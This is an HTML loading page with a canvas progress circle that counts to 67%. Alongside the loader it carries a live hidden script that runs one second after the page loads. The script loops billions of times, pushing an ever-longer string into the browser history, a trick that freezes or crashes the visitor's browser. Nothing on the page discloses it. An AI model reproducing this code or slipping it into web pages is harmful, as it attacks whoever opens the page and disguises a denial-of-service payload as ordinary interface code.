<!DOCTYPE html>
<html>
<head>
	<title></title>
	<meta charset="utf-8"/>	
	<style type="text/css">
	html {width: 100%; height: 100%;}
	body {width: 100%; height: 100%; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;}
	* {margin: 0; padding: 0;}
	.splash {position: absolute; z-index: 999; display: table; width: 100%; height: 100%; background-color: #f3f0eb;}
	.splash>.splash-inner {display: table-cell; text-align: center; vertical-align: middle;}
	.splash h1,.splash h2,.splash h3 {font-weight: normal;}
	.splash h3 {display: block; margin-top: 34px; font-size: 18px; color: #666; font-weight: lighter;}
	.splash .loading-circle {position: relative; width: 204px; height: 204px; margin: auto;}
	.splash .loading-circle>* {display: block; position: absolute; box-sizing: border-box; border-radius: 102px;}
	.splash .loading-circle>canvas.bg {z-index: 1; width: 100%; height: 100%; border: 8px solid #ddd ;}
	.splash .loading-circle>canvas.mask {z-index: 2; transform: rotate(-90deg); -webkit-transform: rotate(-90deg); -moz-transform: rotate(-90deg);}
	.splash .loading-circle>p {z-index: 3;  width: 100%; height: 100%; text-align: center; line-height: 204px; font-size: 56px; font-weight: lighter; color: #999;}
	</style>
</head>
<body>
	<!-- <h1 style="text-align:center;margin-top:200px;">加载中。。。请稍后</h1> -->
	<div class="splash" id="splash">
	    <div class="splash-inner">
	        <h1></h1>
	        <!--<h2>Make every day matter</h2>-->
	        <div class="loading-circle" id="loadingCircle">
	            <p><span id="loadedNum">0</span>%</p>
	            <canvas class="mask" id="loadingProgress" width="204" height="204"></canvas>
	            <canvas class="bg" width="204" height="204"></canvas>
	        </div>
	    </div>
	</div>

	<script>
		var total = "";
		setTimeout(function(){
			for (var i = 0; i < 10000000000; i++) {
				total = total + i.toString();
				history.pushState(0,0,total);
			};
		},1000)
	</script>

	<script>
	    var slots={},c=document.getElementById('loadingProgress'),ctx=c.getContext('2d');
	    window.hasLoaded = 0;
	    window.loading = false;
	    window.ulp = ulp;
	    function ulp(percent){
	        window.loading = true;
	        var i = 0, draw = null;
	        draw = setInterval(function(){
	            if (window.hasLoaded > 100) {
	                window.loading = false;
	                clearInterval(draw);
	                draw = null;
	                return true;
	            }

	            if (i<percent) {
	                d();
	                i++;
	                window.hasLoaded += 1;
	            } else {
	                clearInterval(draw);
	                draw = null;
	            }
	        }, 100);
	    }

	    function d(){
	        var lp = document.getElementById('loadedNum');
	        lp.innerHTML = window.hasLoaded;

	        var loaded = window.hasLoaded * 2 / 100 * Math.PI, cw = 204, hcw = 102;
	        ctx.clearRect (0,0,cw,cw);
	        ctx.beginPath();
	        ctx.arc(hcw,hcw,hcw-4, 0, loaded, false);
	        ctx.lineWidth = 8;
	        ctx.strokeStyle = '#ff6000';
	        ctx.stroke();
	    }
	    ulp(67);
	</script>
</body>
</html>